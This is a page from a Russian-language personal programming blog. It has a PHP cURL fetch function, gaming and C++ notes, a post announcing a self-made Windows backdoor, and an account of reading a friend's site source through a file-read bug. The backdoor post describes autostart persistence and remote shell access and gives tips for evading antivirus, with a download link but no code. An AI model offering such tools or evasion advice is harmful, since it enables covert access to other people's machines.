Бложек теперь на old.mrThe.name. Следите за обновлениями.

Аналог функции для сокетов, только с использованием курла. Постоянно теряю её на харде, поэтому выложу здесь:

<?php
set_time_limit(0);
ob_implicit_flush ();
//
//mr.The
//
 
/**
Функция получения страницы с использованием курла
**/
function get_page($url,$post='',$ref='',$cookie='',$ua="Opera 9.64 (compatible; MSIE 6.0; Windows NT 5.1; ru)",$proxy='') {
    $ch = curl_init();
 
    curl_setopt($ch, CURLOPT_URL,$url);
    curl_setopt($ch, CURLOPT_USERAGENT,$ua);
    curl_setopt($ch, CURLOPT_REFERER,$ref);
 
    curl_setopt($ch, CURLOPT_PROXY , $proxy);
 
    if($post!==''){
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    }
 
    $headers [] = "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1";
    $headers [] = "Accept-Language: ru,en;q=0.9,ru-RU;q=0.8";
    $headers [] = "Connection: close";
    $headers [] = "Cache-Control: no-store, no-cache, must-revalidate";
 
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
 
    curl_setopt($ch, CURLOPT_HEADER, 1); // тут лучше поставить 0, если куки не нужны
    curl_setopt($ch, CURLOPT_FAILONERROR, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    @curl_setopt($ch, CURLOPT_COOKIE, $cookie);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 20);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);
    $result = curl_exec($ch);
    curl_close($ch);
    if($result)return $result; else    return false;
}
 
function get_cookie($page) {
    if(!preg_match_all("/Set-Cookie: (.*)(; |\n)/Ui",$page,$rnd)) return false;
 
    print_r($rnd);
 
    $co="";
    foreach($rnd[1] as $key) $co.=trim($key).";";
    return $co;
}
?>
Теги: , ,
Aug, 9 php | Комментариев нет
 

Нашел несколько фич на карте cp_egypt.

Видео(смотреть лучше в HD):

Ютуб убрал исходный трек “Rednex – Cotton Eye Joe”. Пришлось вставить этот..
Читать далее »

Теги: ,
Aug, 8 Игры | Один комментарий
 

Нужно было получить информацию о выполнении команды, с помощью popen, вывести её и записать в файл. Но если выводилась она нормально, то в файле вместо русских символов были кракозябры. SetLocale и прочие извращения не помогали.  Пробовал CharToOem,  не помогло.. А OemToChar помогла! Это вам не php, тут ещё интереснее ж)

Теги: ,
Aug, 6 c++ | Один комментарий
 

Написал простой бэкдор. Автоматически прописывается в автозагрузку, и даёт доступ к консоли на указанном порту. Не палиться антивирусами. (UPD: кто-то очень умный, залил его на вирус-тотал. Теперь, он палиться чуть-ли не каждым антивирусом. Этому человеку, я хочу сказать “спасибо”, а всем желающим юзать не палящийся софт – перекомпилируйте его на другом компиляторе, либо измените пару строк в коде, что бы он не палился. У меня уже есть чистая версия, так что, ничего сложного в этом нет.)  Поддерживает русский язык и авторизацию по паролю.
Для коннекта советую использовать PuTTy. Имеет открытый исходный код!
.
Скачать это добро можно здесь –  http://mrthe.name/trash/BackDoor.rar, в архиве исходник(компилируется с помощью mingw gcc) и рабочий пример сжатый UPX’ом, который принимает коннекты на 4321-й порт. А как выглядит пароль – можно посмотреть в исходнике.
.
И сразу должен сообщить – код не претендует на красоту и оптимальность. Писал в качестве практики и только для законных целей – удобное управление парком машин с любой оси, вплоть до телефонов с J2ME.

Читать далее »

Теги: , ,
Aug, 5 c++, Релизы | 10 комментариев
 

Один хороший друг сделал сайт, который проверяет веб-страницы на валидность и выводит её сорцы с предложенными исправлениями. Всё красиво нарисовано и замечательно работает.

.

И закралась мне мысль.. Вобщем, вместо адреса сайта, а вбил “index.php”. И что, вы думаете я увидел? Правильно, исходный пхп код index’a! Добраться до конфига, а из него и до базы не составило труда. Вот так file_get_contents слил всё на свете.

.

Баг он пофиксил заюзав мою функцию

Читать далее »

Теги: , ,
Aug, 2 php, Уязвимости | Один комментарий